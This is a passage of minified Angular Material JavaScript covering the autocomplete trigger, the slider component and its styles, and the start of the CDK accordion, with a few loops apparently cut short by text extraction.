r=this.autocomplete._keyManager.activeItem,c=38===i||40===i;9===i||c&&!n&&this.panelOpen?this.autocomplete._keyManager.onKeydown(e):c&&this._canOpen()&&this.openPanel(),(c||this.autocomplete._keyManager.activeItem!==r)&&(this._scrollToOption(this.autocomplete._keyManager.activeItemIndex||0),this.autocomplete.autoSelectActiveOption&&this.activeOption&&(this._pendingAutoselectedOption||(this._valueBeforeAutoSelection=this._element.nativeElement.value),this._pendingAutoselectedOption=this.activeOption,this._assignOptionValue(this.activeOption.value)))}}_handleInput(e){let i=e.target,n=i.value;"number"===i.type&&(n=""==n?null:parseFloat(n)),this._previousValue!==n&&(this._previousValue=n,this._pendingAutoselectedOption=null,this._onChange(n),this._canOpen()&&this._document.activeElement===e.target&&this.openPanel())}_handleFocus(){this._canOpenOnNextFocus?this._canOpen()&&(this._previousValue=this._element.nativeElement.value,this._attachOverlay(),this._floatLabel(!0)):this._canOpenOnNextFocus=!0}_handleClick(){this._canOpen()&&!this.panelOpen&&this.openPanel()}_floatLabel(e=!1){this._formField&&"auto"===this._formField.floatLabel&&(e?this._formField._animateAndLockLabel():this._formField.floatLabel="always",this._manuallyFloatingLabel=!0)}_resetLabel(){this._manuallyFloatingLabel&&(this._formField.floatLabel="auto",this._manuallyFloatingLabel=!1)}_subscribeToClosingActions(){return ra(this._zone.onStable.pipe(Cn(1)),this.autocomplete.options.changes.pipe(qr(()=>this._positionStrategy.reapplyLastPosition()),Z3(0))).pipe(Ur(()=>(this._zone.run(()=>{const n=this.panelOpen;this._resetActiveItem(),this.autocomplete._setVisibility(),this._changeDetectorRef.detectChanges(),this.panelOpen&&this._overlayRef.updatePosition(),n!==this.panelOpen&&(this.panelOpen?this.autocomplete.opened.emit():this.autocomplete.closed.emit())}),this.panelClosingActions)),Cn(1)).subscribe(n=>this._setValueAndClose(n))}_destroyPanel(){this._overlayRef&&(this.closePanel(),this._overlayRef.dispose(),this._overlayRef=null)}_assignOptionValue(e){const i=this.autocomplete&&this.autocomplete.displayWith?this.autocomplete.displayWith(e):e;this._updateNativeInputValue(null!=i?i:"")}_updateNativeInputValue(e){this._formField?this._formField._control.value=e:this._element.nativeElement.value=e,this._previousValue=e}_setValueAndClose(e){const i=e?e.source:this._pendingAutoselectedOption;i&&(this._clearPreviousSelectedOption(i),this._assignOptionValue(i.value),this._onChange(i.value),this.autocomplete._emitSelectEvent(i),this._element.nativeElement.focus()),this.closePanel()}_clearPreviousSelectedOption(e){this.autocomplete.options.forEach(i=>{i!==e&&i.selected&&i.deselect()})}_attachOverlay(){var e;let i=this._overlayRef;i?(this._positionStrategy.setOrigin(this._getConnectedElement()),i.updateSize({width:this._getPanelWidth()})):(this._portal=new Mm(this.autocomplete.template,this._viewContainerRef,{id:null===(e=this._formField)||void 0===e?void 0:e.getLabelId()}),i=this._overlay.create(this._getOverlayConfig()),this._overlayRef=i,this._handleOverlayEvents(i),this._viewportSubscription=this._viewportRuler.change().subscribe(()=>{this.panelOpen&&i&&i.updateSize({width:this._getPanelWidth()})})),i&&!i.hasAttached()&&(i.attach(this._portal),this._closingActionsSubscription=this._subscribeToClosingActions());const n=this.panelOpen;this.autocomplete._setVisibility(),this.autocomplete._isOpen=this._overlayAttached=!0,this.panelOpen&&n!==this.panelOpen&&this.autocomplete.opened.emit()}_getOverlayConfig(){var e;return new yg({positionStrategy:this._getOverlayPosition(),scrollStrategy:this._scrollStrategy(),width:this._getPanelWidth(),direction:this._dir,panelClass:null===(e=this._defaults)||void 0===e?void 0:e.overlayPanelClass})}_getOverlayPosition(){const e=this._overlay.position().flexibleConnectedTo(this._getConnectedElement()).withFlexibleDimensions(!1).withPush(!1);return this._setStrategyPositions(e),this._positionStrategy=e,e}_setStrategyPositions(e){const i=[{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"}],n=this._aboveClass,r=[{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom",panelClass:n},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom",panelClass:n}];let c;c="above"===this.position?r:"below"===this.position?i:[...i,...r],e.withPositions(c)}_getConnectedElement(){return this.connectedTo?this.connectedTo.elementRef:this._formField?this._formField.getConnectedOverlayOrigin():this._element}_getPanelWidth(){return this.autocomplete.panelWidth||this._getHostWidth()}_getHostWidth(){return this._getConnectedElement().nativeElement.getBoundingClientRect().width}_resetActiveItem(){const e=this.autocomplete;e.autoActiveFirstOption?e._keyManager.setFirstItemActive():e._keyManager.setActiveItem(-1)}_canOpen(){const e=this._element.nativeElement;return!e.readOnly&&!e.disabled&&!this._autocompleteDisabled}_getWindow(){var e;return(null===(e=this._document)||void 0===e?void 0:e.defaultView)||window}_scrollToOption(e){const i=this.autocomplete,n=$w(e,i.options,i.optionGroups);if(0===e&&1===n)i._setScrollTop(0);else if(i.panel){const r=i.options.toArray()[e];if(r){const c=r._getHostElement(),d=RW(c.offsetTop,c.offsetHeight,i._getScrollTop(),i.panel.nativeElement.offsetHeight);i._setScrollTop(d)}}}_handleOverlayEvents(e){e.keydownEvents().subscribe(i=>{var n;(27===i.keyCode&&!es(i)||38===i.keyCode&&es(i,"altKey"))&&(this._pendingAutoselectedOption&&(this._updateNativeInputValue(null!==(n=this._valueBeforeAutoSelection)&&void 0!==n?n:""),this._pendingAutoselectedOption=null),this._closeKeyEventStream.next(),this._resetActiveItem(),i.stopPropagation(),i.preventDefault())}),e.outsidePointerEvents().subscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(As),Ee(fo),Ee(qi),Ee(Ma),Ee(MV),Ee(Cr,8),Ee(cb,9),Ee(ga,8),Ee(bm),Ee(bV,8))},t.\u0275dir=Ot({type:t,inputs:{autocomplete:["matAutocomplete","autocomplete"],position:["matAutocompletePosition","position"],connectedTo:["matAutocompleteConnectedTo","connectedTo"],autocompleteAttribute:["autocomplete","autocompleteAttribute"],autocompleteDisabled:["matAutocompleteDisabled","autocompleteDisabled"]},features:[sa]}),t})(),vV=(()=>{class t extends I2e{constructor(){super(...arguments),this._aboveClass="mat-autocomplete-panel-above"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","matAutocomplete",""],["textarea","matAutocomplete",""]],hostAttrs:[1,"mat-autocomplete-trigger"],hostVars:7,hostBindings:function(e,i){1&e&&he("focusin",function(){return i._handleFocus()})("blur",function(){return i._onTouched()})("input",function(r){return i._handleInput(r)})("keydown",function(r){return i._handleKeydown(r)})("click",function(){return i._handleClick()}),2&e&&Rt("autocomplete",i.autocompleteAttribute)("role",i.autocompleteDisabled?null:"combobox")("aria-autocomplete",i.autocompleteDisabled?null:"list")("aria-activedescendant",i.panelOpen&&i.activeOption?i.activeOption.id:null)("aria-expanded",i.autocompleteDisabled?null:i.panelOpen.toString())("aria-owns",i.autocompleteDisabled||!i.panelOpen||null==i.autocomplete?null:i.autocomplete.id)("aria-haspopup",i.autocompleteDisabled?null:"listbox")},exportAs:["matAutocompleteTrigger"],features:[ki([w2e]),ci]}),t})(),AV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[x2e],imports:[bu,Q3,la,rn,uu,Q3,la]}),t})();const R2e=["sliderWrapper"],Ld=ym({passive:!1}),N2e={provide:Ls,useExisting:ja(()=>TV),multi:!0};class L2e{}const z2e=dp(Pd(Zc(class{constructor(t){this._elementRef=t}}),"accent"));let TV=(()=>{class t extends z2e{constructor(e,i,n,r,c,d,T,k){super(e),this._focusMonitor=i,this._changeDetectorRef=n,this._dir=r,this._ngZone=d,this._animationMode=k,this._invert=!1,this._max=100,this._min=0,this._step=1,this._thumbLabel=!1,this._tickInterval=0,this._value=null,this._vertical=!1,this.change=new Tt,this.input=new Tt,this.valueChange=new Tt,this.onTouched=()=>{},this._percent=0,this._isSliding=null,this._isActive=!1,this._tickIntervalPercent=0,this._sliderDimensions=null,this._controlValueAccessorChangeFn=()=>{},this._dirChangeSubscription=I.EMPTY,this._pointerDown=q=>{this.disabled||this._isSliding||!mb(q)&&0!==q.button||this._ngZone.run(()=>{this._touchId=mb(q)?function W2e(t,a){for(let e=0;e{if("pointer"===this._isSliding){const Y=DV(q,this._touchId);if(Y){q.cancelable&&q.preventDefault();const te=this.value;this._lastPointerEvent=q,this._updateValueFromPosition(Y),te!=this.value&&this._emitInputEvent()}}},this._pointerUp=q=>{"pointer"===this._isSliding&&(!mb(q)||"number"!=typeof this._touchId||v8(q.changedTouches,this._touchId))&&(q.cancelable&&q.preventDefault(),this._removeGlobalEvents(),this._isSliding=null,this._touchId=void 0,this._valueOnSlideStart!=this.value&&!this.disabled&&this._emitChangeEvent(),this._valueOnSlideStart=this._lastPointerEvent=null)},this._windowBlur=()=>{this._lastPointerEvent&&this._pointerUp(this._lastPointerEvent)},this._document=T,this.tabIndex=parseInt(c)||0,d.runOutsideAngular(()=>{const q=e.nativeElement;q.addEventListener("mousedown",this._pointerDown,Ld),q.addEventListener("touchstart",this._pointerDown,Ld)})}get invert(){return this._invert}set invert(e){this._invert=wi(e)}get max(){return this._max}set max(e){this._max=Uo(e,this._max),this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}get min(){return this._min}set min(e){this._min=Uo(e,this._min),this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}get step(){return this._step}set step(e){this._step=Uo(e,this._step),this._step%1!=0&&(this._roundToDecimal=this._step.toString().split(".").pop().length),this._changeDetectorRef.markForCheck()}get thumbLabel(){return this._thumbLabel}set thumbLabel(e){this._thumbLabel=wi(e)}get tickInterval(){return this._tickInterval}set tickInterval(e){this._tickInterval="auto"===e?"auto":"number"==typeof e||"string"==typeof e?Uo(e,this._tickInterval):0}get value(){return null===this._value&&(this.value=this._min),this._value}set value(e){if(e!==this._value){let i=Uo(e,0);this._roundToDecimal&&i!==this.min&&i!==this.max&&(i=parseFloat(i.toFixed(this._roundToDecimal))),this._value=i,this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get displayValue(){return this.displayWith?this.displayWith(this.value):this._roundToDecimal&&this.value&&this.value%1!=0?this.value.toFixed(this._roundToDecimal):this.value||0}focus(e){this._focusHostElement(e)}blur(){this._blurHostElement()}get percent(){return this._clamp(this._percent)}_shouldInvertAxis(){return this.vertical?!this.invert:this.invert}_isMinValue(){return 0===this.percent}_getThumbGap(){return this.disabled?7:this._isMinValue()&&!this.thumbLabel?this._isActive?10:7:0}_getTrackBackgroundStyles(){const i=this.vertical?`1, ${1-this.percent}, 1`:1-this.percent+", 1, 1";return{transform:`translate${this.vertical?"Y":"X"}(${this._shouldInvertMouseCoords()?"-":""}${this._getThumbGap()}px) scale3d(${i})`}}_getTrackFillStyles(){const e=this.percent,n=this.vertical?`1, ${e}, 1`:`${e}, 1, 1`;return{transform:`translate${this.vertical?"Y":"X"}(${this._shouldInvertMouseCoords()?"":"-"}${this._getThumbGap()}px) scale3d(${n})`,display:0===e?"none":""}}_getTicksContainerStyles(){return{transform:`translate${this.vertical?"Y":"X"}(${this.vertical||"rtl"!=this._getDirection()?"-":""}${this._tickIntervalPercent/2*100}%)`}}_getTicksStyles(){let e=100*this._tickIntervalPercent,d={backgroundSize:this.vertical?`2px ${e}%`:`${e}% 2px`,transform:`translateZ(0) translate${this.vertical?"Y":"X"}(${this.vertical||"rtl"!=this._getDirection()?"":"-"}${e/2}%)${this.vertical||"rtl"!=this._getDirection()?"":" rotate(180deg)"}`};if(this._isMinValue()&&this._getThumbGap()){const T=this._shouldInvertAxis();let k;k=this.vertical?T?"Bottom":"Top":T?"Right":"Left",d[`padding${k}`]=`${this._getThumbGap()}px`}return d}_getThumbContainerStyles(){const e=this._shouldInvertAxis();return{transform:`translate${this.vertical?"Y":"X"}(-${100*(("rtl"!=this._getDirection()||this.vertical?e:!e)?this.percent:1-this.percent)}%)`}}_shouldInvertMouseCoords(){const e=this._shouldInvertAxis();return"rtl"!=this._getDirection()||this.vertical?e:!e}_getDirection(){return this._dir&&"rtl"==this._dir.value?"rtl":"ltr"}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{this._isActive=!!e&&"keyboard"!==e,this._changeDetectorRef.detectChanges()}),this._dir&&(this._dirChangeSubscription=this._dir.change.subscribe(()=>{this._changeDetectorRef.markForCheck()}))}ngOnDestroy(){const e=this._elementRef.nativeElement;e.removeEventListener("mousedown",this._pointerDown,Ld),e.removeEventListener("touchstart",this._pointerDown,Ld),this._lastPointerEvent=null,this._removeGlobalEvents(),this._focusMonitor.stopMonitoring(this._elementRef),this._dirChangeSubscription.unsubscribe()}_onMouseenter(){this.disabled||(this._sliderDimensions=this._getSliderDimensions(),this._updateTickIntervalPercent())}_onFocus(){this._sliderDimensions=this._getSliderDimensions(),this._updateTickIntervalPercent()}_onBlur(){this.onTouched()}_onKeydown(e){if(this.disabled||es(e)||this._isSliding&&"keyboard"!==this._isSliding)return;const i=this.value;switch(e.keyCode){case 33:this._increment(10);break;case 34:this._increment(-10);break;case 35:this.value=this.max;break;case 36:this.value=this.min;break;case 37:this._increment("rtl"==this._getDirection()?1:-1);break;case 38:this._increment(1);break;case 39:this._increment("rtl"==this._getDirection()?-1:1);break;case 40:this._increment(-1);break;default:return}i!=this.value&&(this._emitInputEvent(),this._emitChangeEvent()),this._isSliding="keyboard",e.preventDefault()}_onKeyup(){"keyboard"===this._isSliding&&(this._isSliding=null)}_getWindow(){return this._document.defaultView||window}_bindGlobalEvents(e){const i=this._document,n=mb(e),c=n?"touchend":"mouseup";i.addEventListener(n?"touchmove":"mousemove",this._pointerMove,Ld),i.addEventListener(c,this._pointerUp,Ld),n&&i.addEventListener("touchcancel",this._pointerUp,Ld);const d=this._getWindow();void 0!==d&&d&&d.addEventListener("blur",this._windowBlur)}_removeGlobalEvents(){const e=this._document;e.removeEventListener("mousemove",this._pointerMove,Ld),e.removeEventListener("mouseup",this._pointerUp,Ld),e.removeEventListener("touchmove",this._pointerMove,Ld),e.removeEventListener("touchend",this._pointerUp,Ld),e.removeEventListener("touchcancel",this._pointerUp,Ld);const i=this._getWindow();void 0!==i&&i&&i.removeEventListener("blur",this._windowBlur)}_increment(e){const i=this._clamp(this.value||0,this.min,this.max);this.value=this._clamp(i+this.step*e,this.min,this.max)}_updateValueFromPosition(e){if(!this._sliderDimensions)return;let c=this._clamp(((this.vertical?e.y:e.x)-(this.vertical?this._sliderDimensions.top:this._sliderDimensions.left))/(this.vertical?this._sliderDimensions.height:this._sliderDimensions.width));if(this._shouldInvertMouseCoords()&&(c=1-c),0===c)this.value=this.min;else if(1===c)this.value=this.max;else{const d=this._calculateValue(c),T=Math.round((d-this.min)/this.step)*this.step+this.min;this.value=this._clamp(T,this.min,this.max)}}_emitChangeEvent(){this._controlValueAccessorChangeFn(this.value),this.valueChange.emit(this.value),this.change.emit(this._createChangeEvent())}_emitInputEvent(){this.input.emit(this._createChangeEvent())}_updateTickIntervalPercent(){if(!this.tickInterval||!this._sliderDimensions)return;let e;if("auto"==this.tickInterval){let i=this.vertical?this._sliderDimensions.height:this._sliderDimensions.width;e=Math.ceil(30/(i*this.step/(this.max-this.min)))*this.step/i}else e=this.tickInterval*this.step/(this.max-this.min);this._tickIntervalPercent=EV(e)?e:0}_createChangeEvent(e=this.value){let i=new L2e;return i.source=this,i.value=e,i}_calculatePercentage(e){const i=((e||0)-this.min)/(this.max-this.min);return EV(i)?i:0}_calculateValue(e){return this.min+e*(this.max-this.min)}_clamp(e,i=0,n=1){return Math.max(i,Math.min(e,n))}_getSliderDimensions(){return this._sliderWrapper?this._sliderWrapper.nativeElement.getBoundingClientRect():null}_focusHostElement(e){this._elementRef.nativeElement.focus(e)}_blurHostElement(){this._elementRef.nativeElement.blur()}writeValue(e){this.value=e}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this.onTouched=e}setDisabledState(e){this.disabled=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(Ma),Ee(Cr,8),Vr("tabindex"),Ee(qi),Ee(ga),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-slider"]],viewQuery:function(e,i){if(1&e&&Mi(R2e,5),2&e){let n;Vt(n=Bt())&&(i._sliderWrapper=n.first)}},hostAttrs:["role","slider",1,"mat-slider","mat-focus-indicator"],hostVars:29,hostBindings:function(e,i){1&e&&he("focus",function(){return i._onFocus()})("blur",function(){return i._onBlur()})("keydown",function(r){return i._onKeydown(r)})("keyup",function(){return i._onKeyup()})("mouseenter",function(){return i._onMouseenter()})("selectstart",function(r){return r.preventDefault()}),2&e&&(Gs("tabIndex",i.tabIndex),Rt("aria-disabled",i.disabled)("aria-valuemax",i.max)("aria-valuemin",i.min)("aria-valuenow",i.value)("aria-valuetext",null==i.valueText?i.displayValue:i.valueText)("aria-orientation",i.vertical?"vertical":"horizontal"),Ct("mat-slider-disabled",i.disabled)("mat-slider-has-ticks",i.tickInterval)("mat-slider-horizontal",!i.vertical)("mat-slider-axis-inverted",i._shouldInvertAxis())("mat-slider-invert-mouse-coords",i._shouldInvertMouseCoords())("mat-slider-sliding",i._isSliding)("mat-slider-thumb-label-showing",i.thumbLabel)("mat-slider-vertical",i.vertical)("mat-slider-min-value",i._isMinValue())("mat-slider-hide-last-tick",i.disabled||i._isMinValue()&&i._getThumbGap()&&i._shouldInvertAxis())("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{disabled:"disabled",color:"color",tabIndex:"tabIndex",invert:"invert",max:"max",min:"min",step:"step",thumbLabel:"thumbLabel",tickInterval:"tickInterval",value:"value",displayWith:"displayWith",valueText:"valueText",vertical:"vertical"},outputs:{change:"change",input:"input",valueChange:"valueChange"},exportAs:["matSlider"],features:[ki([N2e]),ci],decls:13,vars:6,consts:[[1,"mat-slider-wrapper"],["sliderWrapper",""],[1,"mat-slider-track-wrapper"],[1,"mat-slider-track-background",3,"ngStyle"],[1,"mat-slider-track-fill",3,"ngStyle"],[1,"mat-slider-ticks-container",3,"ngStyle"],[1,"mat-slider-ticks",3,"ngStyle"],[1,"mat-slider-thumb-container",3,"ngStyle"],[1,"mat-slider-focus-ring"],[1,"mat-slider-thumb"],[1,"mat-slider-thumb-label"],[1,"mat-slider-thumb-label-text"]],template:function(e,i){1&e&&(m(0,"div",0,1)(2,"div",2),it(3,"div",3)(4,"div",4),u(),m(5,"div",5),it(6,"div",6),u(),m(7,"div",7),it(8,"div",8)(9,"div",9),m(10,"div",10)(11,"span",11),s(12),u()()()()),2&e&&(g(3),F("ngStyle",i._getTrackBackgroundStyles()),g(1),F("ngStyle",i._getTrackFillStyles()),g(1),F("ngStyle",i._getTicksContainerStyles()),g(1),F("ngStyle",i._getTicksStyles()),g(1),F("ngStyle",i._getThumbContainerStyles()),g(5),ke(i.displayValue))},dependencies:[Yv],styles:['.mat-slider{display:inline-block;position:relative;box-sizing:border-box;padding:8px;outline:none;vertical-align:middle}.mat-slider:not(.mat-slider-disabled):active,.mat-slider.mat-slider-sliding:not(.mat-slider-disabled){cursor:grabbing}.mat-slider-wrapper{-webkit-print-color-adjust:exact;color-adjust:exact;position:absolute}.mat-slider-track-wrapper{position:absolute;top:0;left:0;overflow:hidden}.mat-slider-track-fill{position:absolute;transform-origin:0 0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-track-background{position:absolute;transform-origin:100% 100%;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-ticks-container{position:absolute;left:0;top:0;overflow:hidden}.mat-slider-ticks{-webkit-background-clip:content-box;background-clip:content-box;background-repeat:repeat;box-sizing:border-box;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-thumb-container{position:absolute;z-index:1;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-focus-ring{position:absolute;width:30px;height:30px;border-radius:50%;transform:scale(0);opacity:0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider.cdk-keyboard-focused .mat-slider-focus-ring,.mat-slider.cdk-program-focused .mat-slider-focus-ring{transform:scale(1);opacity:1}.mat-slider:not(.mat-slider-disabled):not(.mat-slider-sliding) .mat-slider-thumb-label,.mat-slider:not(.mat-slider-disabled):not(.mat-slider-sliding) .mat-slider-thumb{cursor:grab}.mat-slider-thumb{position:absolute;right:-10px;bottom:-10px;box-sizing:border-box;width:20px;height:20px;border:3px solid rgba(0,0,0,0);border-radius:50%;transform:scale(0.7);transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),border-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-thumb-label{display:none;align-items:center;justify-content:center;position:absolute;width:28px;height:28px;border-radius:50%;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),border-radius 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.cdk-high-contrast-active .mat-slider-thumb-label{outline:solid 1px}.mat-slider-thumb-label-text{z-index:1;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-sliding .mat-slider-track-fill,.mat-slider-sliding .mat-slider-track-background,.mat-slider-sliding .mat-slider-thumb-container{transition-duration:0ms}.mat-slider-has-ticks .mat-slider-wrapper::after{content:"";position:absolute;border-width:0;border-style:solid;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-has-ticks.cdk-focused:not(.mat-slider-hide-last-tick) .mat-slider-wrapper::after,.mat-slider-has-ticks:hover:not(.mat-slider-hide-last-tick) .mat-slider-wrapper::after{opacity:1}.mat-slider-has-ticks.cdk-focused:not(.mat-slider-disabled) .mat-slider-ticks,.mat-slider-has-ticks:hover:not(.mat-slider-disabled) .mat-slider-ticks{opacity:1}.mat-slider-thumb-label-showing .mat-slider-focus-ring{display:none}.mat-slider-thumb-label-showing .mat-slider-thumb-label{display:flex}.mat-slider-axis-inverted .mat-slider-track-fill{transform-origin:100% 100%}.mat-slider-axis-inverted .mat-slider-track-background{transform-origin:0 0}.mat-slider:not(.mat-slider-disabled).cdk-focused.mat-slider-thumb-label-showing .mat-slider-thumb{transform:scale(0)}.mat-slider:not(.mat-slider-disabled).cdk-focused .mat-slider-thumb-label{border-radius:50% 50% 0}.mat-slider:not(.mat-slider-disabled).cdk-focused .mat-slider-thumb-label-text{opacity:1}.mat-slider:not(.mat-slider-disabled).cdk-mouse-focused .mat-slider-thumb,.mat-slider:not(.mat-slider-disabled).cdk-touch-focused .mat-slider-thumb,.mat-slider:not(.mat-slider-disabled).cdk-program-focused .mat-slider-thumb{border-width:2px;transform:scale(1)}.mat-slider-disabled .mat-slider-focus-ring{transform:scale(0);opacity:0}.mat-slider-disabled .mat-slider-thumb{border-width:4px;transform:scale(0.5)}.mat-slider-disabled .mat-slider-thumb-label{display:none}.mat-slider-horizontal{height:48px;min-width:128px}.mat-slider-horizontal .mat-slider-wrapper{height:2px;top:23px;left:8px;right:8px}.mat-slider-horizontal .mat-slider-wrapper::after{height:2px;border-left-width:2px;right:0;top:0}.mat-slider-horizontal .mat-slider-track-wrapper{height:2px;width:100%}.mat-slider-horizontal .mat-slider-track-fill{height:2px;width:100%;transform:scaleX(0)}.mat-slider-horizontal .mat-slider-track-background{height:2px;width:100%;transform:scaleX(1)}.mat-slider-horizontal .mat-slider-ticks-container{height:2px;width:100%}.cdk-high-contrast-active .mat-slider-horizontal .mat-slider-ticks-container{height:0;outline:solid 2px;top:1px}.mat-slider-horizontal .mat-slider-ticks{height:2px;width:100%}.mat-slider-horizontal .mat-slider-thumb-container{width:100%;height:0;top:50%}.mat-slider-horizontal .mat-slider-focus-ring{top:-15px;right:-15px}.mat-slider-horizontal .mat-slider-thumb-label{right:-14px;top:-40px;transform:translateY(26px) scale(0.01) rotate(45deg)}.mat-slider-horizontal .mat-slider-thumb-label-text{transform:rotate(-45deg)}.mat-slider-horizontal.cdk-focused .mat-slider-thumb-label{transform:rotate(45deg)}.cdk-high-contrast-active .mat-slider-horizontal.cdk-focused .mat-slider-thumb-label,.cdk-high-contrast-active .mat-slider-horizontal.cdk-focused .mat-slider-thumb-label-text{transform:none}.mat-slider-vertical{width:48px;min-height:128px}.mat-slider-vertical .mat-slider-wrapper{width:2px;top:8px;bottom:8px;left:23px}.mat-slider-vertical .mat-slider-wrapper::after{width:2px;border-top-width:2px;bottom:0;left:0}.mat-slider-vertical .mat-slider-track-wrapper{height:100%;width:2px}.mat-slider-vertical .mat-slider-track-fill{height:100%;width:2px;transform:scaleY(0)}.mat-slider-vertical .mat-slider-track-background{height:100%;width:2px;transform:scaleY(1)}.mat-slider-vertical .mat-slider-ticks-container{width:2px;height:100%}.cdk-high-contrast-active .mat-slider-vertical .mat-slider-ticks-container{width:0;outline:solid 2px;left:1px}.mat-slider-vertical .mat-slider-focus-ring{bottom:-15px;left:-15px}.mat-slider-vertical .mat-slider-ticks{width:2px;height:100%}.mat-slider-vertical .mat-slider-thumb-container{height:100%;width:0;left:50%}.mat-slider-vertical .mat-slider-thumb{-webkit-backface-visibility:hidden;backface-visibility:hidden}.mat-slider-vertical .mat-slider-thumb-label{bottom:-14px;left:-40px;transform:translateX(26px) scale(0.01) rotate(-45deg)}.mat-slider-vertical .mat-slider-thumb-label-text{transform:rotate(45deg)}.mat-slider-vertical.cdk-focused .mat-slider-thumb-label{transform:rotate(-45deg)}[dir=rtl] .mat-slider-wrapper::after{left:0;right:auto}[dir=rtl] .mat-slider-horizontal .mat-slider-track-fill{transform-origin:100% 100%}[dir=rtl] .mat-slider-horizontal .mat-slider-track-background{transform-origin:0 0}[dir=rtl] .mat-slider-horizontal.mat-slider-axis-inverted .mat-slider-track-fill{transform-origin:0 0}[dir=rtl] .mat-slider-horizontal.mat-slider-axis-inverted .mat-slider-track-background{transform-origin:100% 100%}.mat-slider._mat-animation-noopable .mat-slider-track-fill,.mat-slider._mat-animation-noopable .mat-slider-track-background,.mat-slider._mat-animation-noopable .mat-slider-ticks,.mat-slider._mat-animation-noopable .mat-slider-thumb-container,.mat-slider._mat-animation-noopable .mat-slider-focus-ring,.mat-slider._mat-animation-noopable .mat-slider-thumb,.mat-slider._mat-animation-noopable .mat-slider-thumb-label,.mat-slider._mat-animation-noopable .mat-slider-thumb-label-text,.mat-slider._mat-animation-noopable .mat-slider-has-ticks .mat-slider-wrapper::after{transition:none}'],encapsulation:2,changeDetection:0}),t})();function EV(t){return!isNaN(t)&&isFinite(t)}function mb(t){return"t"===t.type[0]}function DV(t,a){let e;return e=mb(t)?"number"==typeof a?v8(t.touches,a)||v8(t.changedTouches,a):t.touches[0]||t.changedTouches[0]:t,e?{x:e.clientX,y:e.clientY}:void 0}function v8(t,a){for(let e=0;e{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,la]}),t})(),F2e=0;const A8=new ni("CdkAccordion");let V2e=(()=>{class t{constructor(){this._stateChanges=new J,this._openCloseAllActions=new J,this.id="cdk-accordion-"+F2e++,this._multi=!1}get multi(){return this._multi}set multi(e){this._multi=wi(e)}openAll(){this._multi&&this._openCloseAllActions.next(!0)}closeAll(){this._openCloseAllActions.next(!1)}ngOnChanges(e){this._stateChanges.next(e)}ngOnDestroy(){this._stateChanges.complete(),this._openCloseAllActions.complete()}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["cdk-accordion"],["","cdkAccordion",""]],inputs:{multi:"multi"},exportAs:["cdkAccordion"],features:[ki([{provide:A8,useExisting:t}]),sa]}),t})(),B2e=0,H2e=(()=>{class t{constructor(e,i,n){this.accordion=e,this._changeDetectorRef=i,this._expansionDispatcher=n,this._openCloseAllSubscription=I.EMPTY,this.closed=new Tt,this.opened=new Tt,this.destroyed=new Tt,this.expandedChange=new Tt,this.id="cdk-accordion-child-"+B2e++,this._expanded=!1,this._disabled=!1,this._removeUniqueSelectionListener=()=>{},this._removeUniqueSelectionListener=n.listen((r,c)=>{this.accordion&&!this.accordion.multi&&this.accordion.id===c&&this.id!==r&&(this.expanded=!1)}),this.accordion&&(this._openCloseAllSubscription=this._subscribeToOpenCloseAllActions())}get expanded(){return this._expanded}set expanded(e){e=wi(e),this._expanded!==e&&(this._expanded=e,this.expandedChange.emit(e),e?(this.opened.emit(),this._expansionDispatcher.notify(this.id,this.accordion?this.accordion.id:this.id)):this.closed.emit(),this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e)}ngOnDestroy(){this.opened.complete(),this.closed.complete(),this.destroyed.emit(),this.destroyed.complete(),this._removeUniqueSelectionListener(),this._openCloseAllSubscription.unsubscribe()}toggle(){this.disabled||(this.expanded=!this.expanded)}close(){this.disabled||(this.expanded=!1)}open(){this.disabled||(this.expanded=!0)}_subscribeToOpenCloseAllActions(){return this.accordion._openCloseAllActions.subscribe(e=>{this.disabled||(this.expanded=e)})}}return t.\u0275fac=function(e){return 